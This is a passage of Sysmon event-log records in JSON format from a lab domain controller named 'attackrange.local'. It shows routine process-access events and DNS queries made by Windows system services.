2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2380,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2381,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2382,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2383,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2384,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2385,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.767\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F81-5F25-0000-0010433E0400}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.767","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F81-5F25-0000-0010433E0400}","TargetProcessId":"4012","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2386,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.095\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.095","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.","QueryStatus":"1460","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2387,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.642\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.ATTACKRANGE.LOCAL.\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.642","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.ATTACKRANGE.LOCAL.","QueryStatus":"1460","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2388,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.705\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nProcessId: 1216\r\nQueryName: wpad\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.705","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010BCC20000}","QueryName":"wpad","QueryStatus":"1460","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2389,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.816\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001054BF0200}\r\nProcessId: 2384\r\nQueryName: win-dc-6178966\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.816","ProcessGuid":"{41C8662E-1F73-5F25-0000-001054BF0200}","QueryName":"win-dc-6178966","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","EventReceivedTime":"2020-08-01 07:53:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
